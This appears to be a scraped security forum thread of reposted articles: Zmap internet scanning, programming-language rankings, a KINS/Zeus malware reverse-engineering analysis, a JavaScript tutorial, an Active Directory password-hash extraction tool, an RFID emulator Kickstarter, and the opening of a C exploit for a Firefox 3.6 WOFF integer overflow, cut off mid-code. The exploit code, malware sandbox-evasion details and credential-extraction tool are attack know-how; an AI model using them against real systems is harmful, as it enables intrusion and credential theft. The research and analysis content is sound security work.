  8. Scanning the Internet in 45 Minutes by Dennis Fisher The Internet is a big thing. Or, more accurately, a big collection of things. Figuring out exactly how many things, and what vulnerabilities those things contain has always been a challenge for researchers, but a new tool released by a group from the University of Michigan that is capable of scanning the entire IPv4 address space in less than an hour. There have been a handful of Internet-wide scans done by various organizations over the years, but most of them have not had a security motivation. And they can take days or weeks, depending upon how the scan is done and what the researchers were trying to accomplish. But the new Zmap tool built by the Michigan researchers has the ability to perform an Internet-wide scan in about 45 minutes while running on an ordinary server. The tool, which the team presented at the USENIX Security conference last week, is open-source and freely available for other researchers to use. To demonstrate the capabilities of Zmap, the Michigan team, which comprises J. Alex Halderman, an assistant professor, and Eric Wustrow and Zakir Durumeric, both doctoral candidates, ran a scan of the entire IPv4 address space, returning results from more 34 million hosts, or what they estimate to be about 98 percent of the machines in that space. Zmap is designed specifically to bypass some of the speed obstacles that have slowed down some of the previous large-scale scans of the Internet. The researchers removed some of the considerations for machines on the other end of the scan, for example assuming that they sit on well-provisioned networks and can handle fast probes. The result is that the tool can scan more than 1,300 times faster than the venerable Nmap scanner. “While Nmap adapts its transmission rate to avoid saturating the source or target networks, we assume that the source network is well provisioned (unable to be saturated by the source host), and that the targets are randomly ordered and widely dispersed (so no distant network or path is likely to be saturated by the scan). Consequently, we attempt to send probes as quickly as the source’s NIC can support, skipping the TCP/IP stack and generating Ethernet frames directly. We show that ZMap can send probes at gigabit line speed from commodity hardware and entirely in user space,” the researchers say in their paper, “Zmap: Fast Internet-Wide Scanning and Its Security Implications”. “While Nmap maintains state for each connection to track which hosts have been scanned and to handle timeouts and retransmissions, ZMap forgoes any per-connection state. Since it is intended to target random samples of the address space, ZMap can avoid storing the addresses it has already scanned or needs to scan and instead selects addresses according to a random permutation generated by a cyclic multiplicative group.” That stateless scanning, the researchers said, allowed Zmap to get both faster response times and better coverage of the target address space. As for practical applications of the tool, the researchers already have found several. In the last year, the team ran 110 separate scans of the entire HTTPS infrastructure, finding a total of 42 million certificates. Interestingly, they only found 6.9 million certificates that were trusted by browsers. They also found two separate sets of mis-issued SSL certificates, something that’s been a serious problem in recent years. The Zmap team also wrote a custom probe to look for the UPnP vulnerability that HD Moore of Rapid 7 discovered in January. After scanning 15.7 million devices, they found that 3.3 million were still vulnerable. That bug can be exploited with a single packet. “Given that these vulnerable devices can be infected with a single UDP packet [25], we note that these 3.4 million devices could have been infected in approximately the same length of time—much faster than network operators can reasonably respond or for patches to be applied to vulnerable hosts. Leveraging methodology similar to ZMap, it would only have taken a matter of hours from the time of disclosure to infect every publicly available vulnerable host,” the researchers say in the paper. Sursa: Scanning the Internet in 45 Minutes | Threatpost
  9. [h=1]Java tops C as most popular language in developer index[/h] [h=2]As Tiobe factors in more sites in its assessment, Java rises, while C and Objective-C drop in the rankings[/h] By Paul Krill | InfoWorld Java has retaken the lead in this month's Tiobe index of the most popular programming languages, which now assesses more search engines to calculate the numbers. The C language barely slipped to the second spot in the August rendition of the Tiobe Programming Community index. Java last held the lead in March. "C and Objective-C are the biggest victims of adding the 16 new search engines," with Objective-C dropping from third place last month to fourth place, Tiobe said. Winners are the Google Go language, which rose to the 26th ranking after being ranked 42nd; LabView, rising from 100 to 49; and Openedge ABL, moving from 129th to 57th. Tiobe gauges language popularity by assessing searches about languages made on popular sites like Google, Yahoo, Baidu, and Wikipedia. Specifically, Tiobe counts skilled engineers, courses, and third-party vendors pertinent to a language. Most of the new indexes are from the United States and China, with Japanese and Brazilian sites also added to the mix. Reddit and MyWeb are among the new sites being gauged. Still, the new sites count for only a small portion when calculating the ratings. "Yes, we added more search engines to improve the validity of the index," Tiobe Managing Director Paul Jansen said. "Another related reason is to make sure that there are less fluctuations in rankings." Tiobe's rankings have had their critics, including Andi Gutmans, CEO of PHP tools vendor Zend Technologies. And consistency among these indexes is now in question. Last month, Tiobe and the rival Pypl Popularity of Programming Language index both had decidedly different takes on the PHP language, with Tiobe saying it was making a comeback while Pypl said it was declining. For the month of August, Java turned up in 15.978 percent of Tiobe's searches, barely ahead of C, at 15.974 percent. Rounding out the top five were C++ (9.371 percent), Objective-C (8.082 percent), and PHP (6.694 percent). Pypl, which assesses just the volume of language tutorials searched in Google, also had Java tops (a 27.2 percent share of the index). It was followed by PHP (14.3 percent), C# (9.8 percent), Python (also 9.8 percent), and C++ (9.1 percent). This story, "Java tops C as most popular language in developer index," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter. Sursa: Java tops C as most popular language in developer index | Java programming - InfoWorld
  10. KINS malware: initialization and DNA paternity test A new post about KINS, I don’t have anything interesting on my hands right now so I decided to go on with the analysis of it. This was my first idea, but someone (Thanks Michael) suggested to me something to add to the analysis. The idea comes from a simple question: is KINS a new myth or is it just born from the leaked Zeus source code? Well, I’ll start looking at KINS with an eye to Zeus trying to understand if there are some similarities or not. Holidays are coming and I don’t have a lot of free time for a complete analysis of the entire malware, right now you have to be satisfied with just the ground of KINS and Zeus_leaked_source_code, the initialization part only. It’s generally an annoying job but from the ground you can understand a lot of information of the malware. Anyway, I’ll try to write something light and readable. Reference KINS malware: md5 = 7b5ac02e80029ac05f04fa5881a911b2 Reference Zeus leaked source code: version 2.0.8.9 Encrypted strings Strings are always a good starting point and like almost all the malwares out there every suspicious string has been crypted, most of the time a simple xor encryption would suffice. KINS doesn’t decrypt all the strings in a unique time, it decrypts a single string when it has to use it. Inside the .text section there’s an array of _STRINGINFO structures, each structure contains the necessary data about a single encrypted string: 00000000 _STRINGINFO struc ; (sizeof=0x8) 00000000 key db ? ; xor key used to decrypt the encoded string 00000001 db ? ; undefined ; unused because xor key is 1 byte only 00000002 size dw ? ; size of the string to decrypt 00000004 encodedString dd ? ; string to decrypt 00000008 _STRINGINFO ends When the malware needs a string it calls DecryptStringW passing an index to it, the index is the array index: 4231CA DecryptStringW proc near 4231CA movzx eax, ax ; Id of the string to decrypt 4231CD lea eax, STRINGINFO[eax*8] ; current _STRINGINFO identified by the index 4231D4 xor ecx, ecx 4231D6 xor edx, edx ; iterator index 4231D8 cmp cx, [eax+_STRINGINFO.size] 4231DC jnb short loc_423209 4231DE push ebx 4231DF push edi 4231E0 DecryptStringIterator: 4231E0 mov edi, [eax+_STRINGINFO.encodedString] 4231E3 movzx ebx, [eax+_STRINGINFO.key] 4231E6 movzx ecx, dx 4231E9 movsx di, byte ptr [edi+ecx] 4231EE xor di, bx ; xor with key 4231F1 xor di, dx ; xor with iterator index 4231F4 mov ebx, 0FFh 4231F9 and di, bx ; the result is a unicode string 4231FC inc edx ; increase iterator index 4231FD mov [esi+ecx*2], di ; decrypt byte by byte 423201 cmp dx, [eax+2] 423205 jb short DecryptStringIterator 423207 pop edi 423208 pop ebx 423209 loc_423209: 423209 movzx eax, [eax+_STRINGINFO.size] 42320D xor ecx, ecx 42320F mov [esi+eax*2], cx ; put NULL at the end of the string 423213 retn 423213 DecryptStringW endp A double xor operation over every byte of the encrypted string. KINS uses the same structure (_STRINGINFO) and the same decryption method (DecryptStringW) used by Zeus_leaked_source_code. It’s a perfect copy&paste approach. There are a lot of strings declared inside the exe, a comparison of the decrypted string is necessary. To decrypt all the string inside KINS you can use this simple idc function script: static ListStrings(address){ auto iString; auto sInfo; auto xorKey; auto sLen; auto crypted; auto i; Message("\nDecrypted string list:\n"); iString = 0; while((address + iString) < 0x4026C8) { sInfo = address + iString; xorKey = Byte(sInfo); if (xorKey != 0) { sLen = Word(sInfo+2); crypted = Dword(sInfo+4); if (!((crypted MaxEA()))) { Message("\""); for(i=0;i<sLen;i++) Message("%c", Byte(crypted+i) ^ xorKey ^ i); Message("\"\n"); iString = iString + 7; // sizeof(_STRINGINFO) - 1 } } iString++; } } The result list contains a lot of interesting strings but comparing this list with the original one provided by Zeus you can note a lot of equal strings. I have to admit that there are some new entries but the core remains the same. Init KINS initialization resides inside a snippet of code starting @407A25 and ending @407C73. It performs all the necessary tasks needed for a clear execution of itself. Looking inside the code you’ll notice that Init procedure is referenced by two different places, one at the beginning of the malware and the other one during its execution. Besides, Init has a lot of calls inside but not all are executed at the first time. That’s because KINS has 2 level of initialization, it has to sets some things now and some later. The first level of execution is performed at the very beginning of the code and the second level is executed when particular operation has to be done. I’ll tell you something more about this 2° level in the next blog post. I.e.: the process injection feature requires the execution of parts of the Init procedure that are not scheduled in the first execution of Init. I think KINS doesn’t want to spoil a lot in his first part of the code, and prefer to follow an exact time scheme. I said KINS but I should say Zeus because this particular code structure is the same used by Zeus. Moreover, there’s another piece of code taken by a copy&paste: to decide what to setup the first time and what later Init checks the dword value passed as a parameter, I call it “flags”. flags is checked inside some if statements, here is a practical example: .text:00407A31 mov eax, [ebp+flags] // INITF_NORMAL_START the first time, (INITF_INJECT_START | INITF_HOOKS_FOR_USER) the next one ... .text:00407A36 mov esi, eax .text:00407A38 and esi, 1 // Check for INITF_INJECT_START flag bit .text:00407A3B mov [esp+420h+flags_Core], esi .text:00407A3F jnz short loc_407A4B .text:00407A41 xor ebx, ebx // First time .text:00407A43 mov processFlags, ebx .text:00407A49 jmp short loc_407A4D .text:00407A4B xor ebx, ebx // Second time .text:00407A4D call InitLoadModules flags represents the value passed to Init, the first time flags’s value is 0 (INIT_NORMAL_START) and the second time is 3 (INITF_INJECT_START | INITF_HOOKS_FOR_USER). I have started the analysis right now but copy&paste method has been used a lot of times. For a better explanation I announce you that KINS is heavily based on Zeus_leaked_source_code. Some parts are really equals, some parts have minor changes only, some of them have interesting additions and some of them are from Zeus version above 2.0.8.9. Yes, KINS writers took something from more than one Zeus version. Copy&paste As far as I’ve seen the core of the malware is equal to Zeus’s core. It’s based on the same structures, variables and code design. Here is a list of things that are directly taken from Zeus. - Global variables Global variables is one of the first things I tried to understand, and I have to say that most of them are simple flags used to recognize a particular status or event. You can recognize them from the code looking at mov instructions: 407C34 mov ref_count, ebx 407C3A mov reportFile, ax 407C40 mov registryKey, ax 407C46 mov readWriteMutex_localconfig, ax 407C4C mov registryKey_localconfig, ax 407C52 mov readWriteMutex_localsetting, ax 407C58 mov registryKey_localsetting, ax - Memory initialization The malware will need dynamic allocated memory, you can find the initialization memory code starting from @407A5D. This time you can see a mix of flag/variable init: 407A5D push ebx 407A5E push 80000h 407A63 push ebx 407A64 call ds:HeapCreate 407A6A mov mainHeap, eax 407A6F cmp eax, ebx 407A71 jnz short HeapCreate_OK 407A73 call ds:GetProcessHeap 407A79 mov hHeap, eax 407A7E mov heapCreated, bl ; heapCreated = false; 407A84 jmp short loc_407A8D 407A86 HeapCreate_OK: 407A86 mov heapCreated, 1 ; heapCreated = true; mainHeap is a global variable and heapCreated is just a flag used to set the success or not of the heap creation process. - Crypt initialization Crypto is used by KINS and like all the other functionalities it requires a small place inside Init. 407A9A mov _last_rand_tickcount, ebx ; _last_rand_tickcount = 0; 407AA0 mov crc32Intialized, bl ; crc32Intalized = false; From the only two lines of code used to perform this init operation it’s hard to predict the meaning of them but, again, flag and var are used. If you want to understand some more things about them you can try with xref IDA option. After some more investigations you can understand their real use: _last_rand_tickcount is used in comparison between a value obtained by GetTickCount and the previous tick count value. crc32Initialized is true if crc32 has been initialized, false otherwise. - Winsock initialization Another expected feature of the malicious program is the ability to communicate with the server. A malware should send something to the server, and to start this communication process it needs a call to a function like WSAStartup. The winsock part is all inside a single call instruction to WSAStartup. KINS and Zeus initiate a client-server communication in the same classical way. - initHandles, initUserData, initPaths The name of the 3 procedures used above are taken from Zeus_leaked_source_code, and I put them together because they initialize global variables only. The procedures are not so interesting per se.. To sum-up I can say that KINS creates a manual reset event, it gets the security information of a logon access (it saves two values: the length of the logon security identifier (SID) and an Id which is calculated by crc32(SID)), and it gets the full path for KINS executable. - initOsBasic The last fully copy&paste code contains Os based tasks. It starts determining whether KINS is running under WOW64 or not. The status is saved inside a boolean flag and after that it tries to add a new full access security descriptor. Once again it saves the result of the operation, it’s not a flag variable but a structure with information about the security descriptor. An empty structure means an error during the task. If everything goes fine, KINS produces a 16 bytes long identifiers based on the volume GUID path: 41D9C0 push 64h ; cchBufferLength 41D9C2 lea eax, [ebp+74h+szVolumeName] 41D9C5 push eax ; lpszVolumeName 41D9C6 lea eax, [ebp+74h+szVolumeMountPoint] 41D9CC push eax ; lpszVolumeMountPoint 41D9CD call edi ; GetVolumeNameForVolumeMountPointW 41D9CF test eax, eax ; check the result 41D9D1 jz short GetVolumeNameForVolumeMountPointW_FAILS 41D9D3 cmp [ebp+74h+sz], '{' ; a minor check over the obtained string 41D9D8 jnz short ERROR 41D9DA push [ebp+74h+pclsid] ; pclsid 41D9DD xor eax, eax 41D9DF mov [ebp+74h+var_68], ax ; str[38] = 0; 41D9E3 lea eax, [ebp+74h+sz] 41D9E6 push eax ; lpsz 41D9E7 call ds:CLSIDFromString ; ottiene: GetVolumeNameForVolumeMountPoint could fail, just in case the snippet above can be executed more than one time. The first lpszVolumeMountPoint value is obtained calling SHGetFolderPath. In case GetVolemeNameForVolumeMountPoint fails the new lpszVolumeMountPoint string is obtained cutting the last part of it (it uses PathRemoveFileSpec). I.e.: it tries “C:\WINDOWS\” and then with “C:\” only. From the organization of the code and the large variety of flags/variables used seems like there’s a big focus to the details. If something goes wrong, or if KINS thinks that it doesn’t have the right condition to run it stops running. I.e.: KINS uses a variable to store a value obtained from the combination of the Os version and the integrity level. If the value is out from a range of specific acceptable values the malware stops. That’s why Zeus was, from some points of views, a master-piece. Yes, I said Zeus and you know why. Copy&paste with minor changes It happens when the code structure of a procedure is the same of the original version but there are some changes or additions. It’s the case of the InitLoadModules function, basically it’s a sequence of DecryptString/GetProcAddress calls. The list of functions address to retrieve is slightly changed from Zeus. The new list is composed by: NtCreateThread, NtCreateUserProcess, NtQueryInformationProcess, NtQueryInformationThread, RtlUserThreadStart, NtMapViewOfSection, NtUnmapViewOfSection, NtSuspendProcess, NtResumeProcess, NtClose and LdrFindEntryForAddress. I don’t know if it’s a KINS addition or it’s taken from a Zeus new version. I’m not a security expert and I can’t access all the possible Zeus versions but it’s a doubt I have: KINS takes some concept from other Zeus versions (over the one I’m referring to, 2.0.8.9). Copy&paste from more recent Zeus version Here’s a practical example of my doubt, the anti check routine! As I said before KINS runs under particular conditions, and his continuation depends on the values returned by the 8 calls called here. Every call performs a specific check: - CheckForPopupKiller: look for “C:\popupkiller.exe” file, if it exists KINS aborts - CheckForExecuteExe: another unwanted file on the system is “C:\TOOLS\execute.exe” - CheckForSbieDll: it’s time for a dll check, it tries to load “SbieDll.dll” (Sandboxie related dll), it won’t that dll on the system - CheckMutexFrz_State: the mutex under the observation is Frz_State which is from Deep Freeze software - CheckForNPF_NdisWanIp: the network related tool check, KINS doesn’t want “\\.\NPF_NdisWanIp” on the system - CheckForVMWareRelatedFiles: VmWare is strictly prohibited: “\\.\HGFS” and “\\.\vmci” are the file to look for - CheckForVBoxGuest: even VirtualBox is prohibited (“\\.\VBoxGuest”) - CheckForSoftwareWINERegKey: check the existence of the key “Software\WINE” If one of the calls above fails KINS aborts his execution immediately. There’s no trace of this code inside Zeus_leaked_source_code but I read some articles on the net talking about this specific snippet. You can read something here Snippets based on Zeus with KINS specific features That’s the most interesting part of the malware Init, the place where something new join the party! In this part of the code the malware tries to create some Id values, they are based on the machine components and properties (computer name, version information, install date, GUID, physical memory and volume serial number). Zeus does the same but it uses a simple xor decryption, crc32 and Rc4 in his calculations. KINS substitutes everything with the use of his personal virtual machine combined to crc32, Rc4, Sha1 hash algorithm and some brain blasting calculation. I won’t go in details right here but if you need it drop me a mail and I’ll tell you more. Basically, the addition are strictly related to the use of the virtual machine only. I gave a description of the virtual machine here, but I didn’t talk about his usage inside the malware. The VM is called some times during the life time of the malware but every time the VM modifies DataBuffer in the same way (it means the algo produced by the VM is always the same). When the VM ends, a number of bytes from DataBuffer are taken for the specific usage; in this initialization process they are used as a key for Rc4 algo. Imho, it’s quite strange approach. I don’t know why you have to call the same algo a lot of times, especially when the result is always the same. Maybe it’s just a way to confuse the job of the reversers out there or maybe I’m missing something… Is KINS a new myth or is it just born from the leaked Zeus source code? Well, I’m not a security expert and I can’t say it for sure but judging from what I’ve seen so far I think that KINS is strongly based on Zeus_leaked_source_code, they have the same DNA! It’s the same concept of the real life, KINS has something completely new, but the core comes from the father, Zeus. Anyway, this is only an introduction to the DNA paternity test. Now I would like to know if we can apply the same concept to all the features of both malwares. Maybe soon, now it’s holiday time! Sursa: KINS malware: initialization and DNA paternity test | My infected computer
  11. JavaScript Object Oriented Programming(OOP) Tutorial Object Oriented Programming is one of the most famous way to do programming. Before OOPs there was only list of instructions execute one bye one. But in OOPs we will deal with Objects and how those objects t interact with one another. JavaScript supports Object Oriented Programming but not the same way as other OOP languages(c++,php,Java,etc.). The main difference between these language and JavaScript is, there is no Classes in JavaScript where the classes are very impotent to create objects. But there is a way we can simulate the Class concept in JavaScript. Another important difference is data hiding. There is no access specifiers like (public,private,protected) in JavaScript. Again we will simulate the concept using variable scope in functions. Object Oriented Programming Concepts 1)Object 2)Class 3)Constructor 4)Inheritance 5)Encapsulation 6)Abstraction 7)Polymorphism Preparing the work space Create a new file "oops.html" and write this code on it. We will write all our JavaScript code on this file. <html> <head> <title>JavaScript Object Oriented Programming(OOPs) Tutorial</title> </head> <body> <script type="text/javascript"> //Write your code here..... </script> </body> </html> 1)Object Any real time entity is consider as Object. Every Object will have some properties and functions. For example consider person as an object then he will have properties like name,age,etc. And functions as walk, talk, eat, think,etc. Now lets see how we create objects in JavaScript. There are so many ways we can create objects in JavaScript. Some of them are //1)Creating Object through literal var obj={}; //2)Creating with Object.create var obj= Object.create(null); //3)Creating using new keyword function Person(){} var obj=new Person(); We can use any of the above way to create Object. 2)Class As I said earlier there on classes in JavaScript. Because JavaScript is Prototype based language. But we can simulate the class concept using JavaScript functions. function Person(){ //Properties this.name="aravind"; this.age="23"; //functions this.sayHi=function(){ return this.name +" Says Hi"; } } //Creating person instance var p=new Person(); alert(p.sayHi()); 3)Constructor Actually Constructor is a concepts comes under Class concept. The constructor is used to assign values to the properties of the Class when creating object using new operator. In above code we have use name,age properties for Person class now will assign values while creating new objects for person class as below. function Person(name,age){ //Assigning values through constructor this.name=name; this.age=age; //functions this.sayHi=function(){ return this.name +" Says Hi"; } } //Creating person instance var p=new Person("aravind",23); alert(p.sayHi()); //Creating Second person instance var p=new Person("jon",23); alert(p.sayHi()); 4)Inheritance Inheritance is a concept of getting the properties and function of one class to other class is classed Inheritance. For example lets consider "Student" Class. Now the Student also have properties name,age. We already have this properties in Person class. So it's much better to acquiring the properties of the Person instead of re-creating those properties. Now lets see how we can do inheritance in JavaScript. function Student(){} //1)Prototype based Inhertance Student.prototype= new Person(); //2)Inhertance throught Object.create Student.prototype=Object.create(Person); var stobj=new Student(); alert(stobj.sayHi()); We can do inheritance in above two ways. 5)Encapsulation Before we learn Encapsulation and Abstraction first we need to know what is data hiding? and who can we achieve it in JavaScript. Date hiding means hiding the data form accessing it out side the scope. For example in Person class and we have Date of Birth(dob) properties and we want to hide it form out side. Let's see how can we do it. function Person(){ //this is private varibale var dob="8 June 2012"; //public properties and functions return{ age:"23", name:"aravind", getDob:function(){ return dob; } } } var pobj=new Person(); //this will get undefined //because it is private to Person console.log(pobj.dob); //Will get dob value we using public //funtion to get private data console.log(pobj.getDob()); Now Encapsulation Means wrapping up of public and private data into a single data unit is called Encapsulation. Above example is one best suites Encapsulation. 6)Abstraction Abstraction means hiding the inner implementation details and showing only outer details. To understand Abstraction we need to understand Abstract and Interface concepts from Java. But we don't have any direct Abstract or Interface in JS. Ok! now in-order to understand abstraction in JavaScript lets take a example form JavaScript library JQuery. In JQuery we will use $("#ele")to select select an element with id ele on a web page. Actually this code calls negative JavaScript code document.getElementById("ele");But we don't need to know that we can happy use the $("#ele") without knowing the inner details of the implementation. 7)Polymorphism The word Polymorphism in OOPs means having more than one form. In JavaScript a Object,Property,Method can have more than one form. Polymorphism is a very cool feature for dynamic binding or late binding. function Person(){ this.sayHI=function(){} }; //This will create Student Class function Student(){}; Student.prototype=new Person(); Student.prototype.sayHI=function(l){ return "Hi! I am a Student"; } //This will create Teacher Object function Teacher(){}; Teacher.prototype=new Person(); Teacher.prototype.sayHI=function(){ return "Hi! I am a Teacher"; } var sObj=new Student(); //This will check if the student //object is instance of Person or not //if not it won't execute our alert code. if (sObj instanceof Person) { alert("Hurry! JavaScript supports OOps"); } Conclusion JavaScript supports Object Oriented Programming(OOP)Concepts. But it may not be the direct way. We need to create some simulation for some concepts. 10 Aug 2013 by aravind buddha at 10:44 PM Sursa:JavaScript Object Oriented Programming(OOP) Tutorial : Techumber
  12. [h=1]Active Directory Password Hash Extraction[/h] Just added a tool for offline Active Directory password hash extraction. It has very basic functionality right now but much more is planned. Command line application that runs on Windows only at the moment. ntds_decode -s <FILE> -d <FILE> -m -i -s <FILE> : SYSTEM registry hive -d <FILE> : Active Directory database -m : Machines (omitted by default) -i : Inactive, Locked or Disabled accounts (omitted by default) The SYSTEM registry hive and Active Directory database are from a domain controller. These files are obviously locked so you need to backup using the Volume Shadow Copy Service. The output format is similar to pwdump and only runs on Windows at the moment. LM and NTLM hashes are extracted from active user accounts only. ntds_decode mounts the SYSTEM file so Administrator access is required on the computer you run it on. If you’re an experienced pen tester or Administrator that would like to test this tool, you can grab from here It’s advisable you don’t use the tool unless you know what you’re doing. Source isn’t provided at the moment because it’s too early to release. If you have questions about it, feel free to e-mail the address provided in README.txt Sursa: Active Directory Password Hash Extraction | Insecurety Research
  13. RFIDler - A Software Defined RFID Reader/Writer/Emulator RFIDler (RFID Low-frequency Emulater & Reader). An open platform RFID reader/writer/emulator that can operate in the 125-134 KHz range. Software Defined is the buzz-word in RF these days, and we use SDR (Software Defined Radio) in our work as reverse-engineers all the time, with great projects like HackRF and GNU Radio, etc. So when it came to looking at RFID for a recent engagement, we decided to see if we couldn't apply the same thinking to that technology. And guess what? Yes, you can! One of our team, Adam Laurie (aka Code Monkey), has spent many years playing with RFID, and is the author of RFIDIOt, the open-source RFID python software library, so is very familiar with the higher-level challenges associated with these devices. However, a complete understanding of what goes on 'under the hood' is harder to come by, and it was only when he teamed up with Chip Monkey, Zac Franken, who has been hardware hacking and pulling things to bits (and putting them back together so they do something much more fun) since he was big enough to hold a screwdriver, that the full picture started to emerge... The Goal To produce a tool for Low Frequency (125-134Khz) RFID research projects, as well as a cut-down (Lite) version that can be embedded into your own hardware projects. The fully featured version we hope to bring in for around £30.00, and the Lite version for under £20.00. Features We have written extensive firmware which includes a user interface and an API to allow easy use of the system and to allow you to explore, read and emulate a wide range of low frequency RFID tags. Utilise ANY modulation scheme, including bi-directional protocols Write data to tag Read data from tag Emulate tag Sniff conversations between external reader & tag Provide raw as well as decoded data Built-in antenna External antenna connection USB power and user interface TTL interface GPIO interface JTAG interface for programming USB Bootloader for easy firmware updating External CLOCK interface if not using processor External power connector if not using USB The hardware gives you the capability to read/write/emulate more or less any LF tag, but we've also taken the hard work out of most of them by implementing all the tag types we can find in the public domain. These include: EM4102 / Unique Hitag 1/2/S FDX-B (ISO 11784/5 Animal Standard) Q5 T55xx Indala Noralsy HID Prox NXP PCF7931 Texas Instruments VeriChip FlexPass Firmware We have working firmware that proves the concept, and we will continue to develop the code to provide both command line interface and API for end-user applications. This will be posted in a github repository, here: https://github.com/ApertureLabsLtd/RFIDler Hardware The three devices we will produce are: RFIDler-LF-Nekkid - The bare naked circuit board with built-in antenna, ready for you to populate the electronic components yourself. RFIDler-LF-Lite - This is the board with only the low-level RFID communication components, to allow you to incorporate it into your own projects (e.g. controlling it with Arduino, Rasperry-pi, Beagle-Bone etc.), providing GPIO, power and clock interfaces only. Firmware can be ported from (and/or contributed to) the RFIDler repository, or write your own from scratch. RFIDler-LF-Standard - This is the fully populated Low Frequency (125/134KHz) board with on-board processor that can be used as a stand-alone device for research and in-the-field testing etc., providing TTL and USB serial command line and API interfaces as well as raw GPIO, clock and power. Your pledges will help us get this from working prototype to final production run, and incorporate where possible any cool ideas/features that we hadn't thought of, and bring Software Defined RFID to the masses! The challenges we have left to complete are: Processor selection - we've used the Pic32 as a proof-of-concept chip, but there may be others better suited to this kind of application. We will research and test 2 or 3 other chips before making a final decision. Coil design - coils are almost as mysterious as RFID itself, so we need to try various designs to see which on-board and external coils give us the best performance across the target frequency ranges. Final Board Layout - Layout the final boards and send to manufacturing. Further Details Here is Adam's blog entry on the subject: Obviously a Major Malfunction...: RFIDler - An open source Software Defined RFID Reader/Writer/Emulator And here is the prototype: And here we are reading an Indala PSK tag: The logic analyser trace shows that RFIDler is pulsing on the PSK Reader line whenever there is a phase change on the analogue line (the small green pulses are negative, and the large ones positive). All our software has to do is detect those pulses at each bit period, and clock out the data. The 'Bitstream' line shows the software bit value detection in action, as it's being driven by the UBW32 board. The other nice thing we can do in software is monitor the quality of the read: the width of the reader pulse will narrow as the coil goes in and out of the field, and the coils 'de-couple', so we can flag a read error when the pulse gets too narrow. This is important when you're looking at unknown tag types: the manufacturer may have a built-in parity or other data checks so their native reader knows when it's getting a good read, but we don't have the knowledge of the relevant algorithms, so cannot do the same. With this technique, we can easily filter out bad reads that will give us corrupt data. Of course, as well as reading a tag, we want to be the tag, so here we are emulating PSK: and we could do that for any bitrate, modulation scheme or data pattern (within reason), as well as have 2-way conversations (e.g. Hitag2). So that brings us to where we are now... Timeframe We've allowed the following timeframes for each stage: Project starts in October (assuming we get funded! Full circuit design and CPU selection: 4 weeks, taking us to November. Beta test phase: 6 weeks up to mid-December, then it's the Christmas & New Year break... Final production run: 4 weeks starting in January, so we should be done by February. We all know that in real life timescales slip, but since the underlying hardware is already proven in our prototype, and all we're really doing now is fine-tuning and incorporating feedback from the beta test, we expect this to be a fairly quick project! Risks and challenges Learn about accountability on Kickstarter We have great facilities in-house for prototyping electronic circuits, and so we expect the main challenges to have been worked out before we go to the trouble and expense of outside manufacturing. However, we also have a great relationship with our fab company, who we have used for several years on many successful projects, so we know they have the resources to get the job done. We look forward to working with you! FAQ Have a question? If the info above doesn't help, you can ask the project creator directly. Sursa: RFIDler - A Software Defined RFID Reader/Writer/Emulator by Aperture Labs Ltd. — Kickstarter
  14. [h=1]Mozilla Firefox 3.6 - Integer Overflow Exploit[/h] #include <stdio.h>#include <stdlib.h> #include <string.h> #include <zlib.h> /* x90c WOFF 1day exploit (MFSA2010-08 WOFF Heap Corruption due to Integer Overflow 1day exploit) CVE-ID: CVE-2010-1028 Full Exploit: http:/www.exploit-db.com/sploits/27698.tgz Affacted Products: - Mozilla Firefox 3.6 ( Gecko 1.9.2 ) - Mozilla Firefox 3.6 Beta1, 3, 4, 5 ( Beta2 ko not released ) - Mozilla Firefox 3.6 RC1, RC2 Fixed in: - Mozilla Firefox 3.6.2 ( after 3.6 version this bug fixed ) security bug credit: Evgeny Legerov < intevydis.com > Timeline: 2010.02.01 - Evengy Legerov Initial discovered and shiped it into "Immunity 3rd Party Product VulnDisco 9.0" https://forum.immunityinc.com/board/thread/1161/vulndisco-9-0/ 2010.02.18 - without reporter, it self analyzed and contact to mozilla and secunia before advisory reporting http://secunia.com/advisories/38608 2010.03.19 - CVE registered http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1028 2010.03.22 - Mozilla advisory report http://www.mozilla.org/security/announce/2010/mfsa2010-08.html 2010.04.01 - x90c exploit (x90c.org) Compile: [root@centos5 woff]# gcc CVE-2010-1028_exploit.c -o CVE-2010-1028_exploit -lz rebel: greets to my old l33t hacker dude in sweden ... BSDaemon: and Invitation of l33t dude for exploit share #phrack@efnet, #social@overthewire x90c */ typedef unsigned int UInt32; typedef unsigned short UInt16; /* for above two types, some WOFF header struct uses big-endian byte order. */ typedef struct { UInt32 signature; UInt32 flavor; UInt32 length; UInt16 numTables; UInt16 reserved; UInt32 totalSfntSize; UInt16 majorVersion; UInt16 minorVersion; UInt32 metaOffset; UInt32 metaLength; UInt32 metaOrigLength; UInt32 privOffset; UInt32 privLength; } WOFF_HEADER; typedef struct { UInt32 tag; UInt32 offset; UInt32 compLength; UInt32 origLength; UInt32 origChecksum; } WOFF_DIRECTORY; #define FLAVOR_TRUETYPE_FONT 0x0001000 #define FLAVOR_CFF_FONT 0x4F54544F struct ff_version { int num; char *v_nm; unsigned long addr; }; struct ff_version plat[] = { { 0, "Win XP SP3 ko - FF 3.6", 0x004E18ED }, { 1, "Win XP SP3 ko - FF 3.6 Beta1", 0x004E17BD }, { 2, "Win XP SP3 ko - FF 3.6 Beta3", 0x004E193D }, { 3, "Win XP SP3 ko - FF 3.6 Beta4", 0x004E20FD }, { 4, "Win XP SP3 ko - FF 3.6 Beta5", 0x600A225D }, { 5, "Win XP SP3 ko - FF 3.6 RC1", 0x004E17BD }, { 6, "Win XP SP3 ko - FF 3.6 RC2", 0x004E18ED }, { 0x00, NULL, 0x0 } }; void usage(char *f_nm) { int i = 0; fprintf(stdout, "\n Usage: %s [Target ID]\n\n", f_nm); for(i = 0; plat.v_nm != NULL; i++) fprintf(stdout, "\t{%d} %s. \n", (plat.num), (plat.v_nm)); exit(-1); } int main(int argc, char *argv[]) { WOFF_HEADER woff_header; WOFF_DIRECTORY woff_dir[1]; FILE *fp; char dataBlock[1024]; char compressed_dataBlock[1024]; char de_buf[1024]; int total_bytes = 0, total_dataBlock = 0; unsigned long destLen = 1024; unsigned long de_Len = 1024; unsigned long i = 0; unsigned long addr_saved_ret_val = 0; int ret = 0; int n = 0; if(argc < 2) usage(argv[0]); n = atoi(argv[1]); if(n < 0 || n > 6) { fprintf(stderr, "\nTarget number range is 0-6!\n"); usage(argv[0]); } printf("\n#### x90c WOFF exploit ####\n"); printf("\nTarget: %d - %s\n\n", (plat[n].num), (plat[n].v_nm)); // WOFF HEADER woff_header.signature = 0x46464F77; // 'wOFF' ( 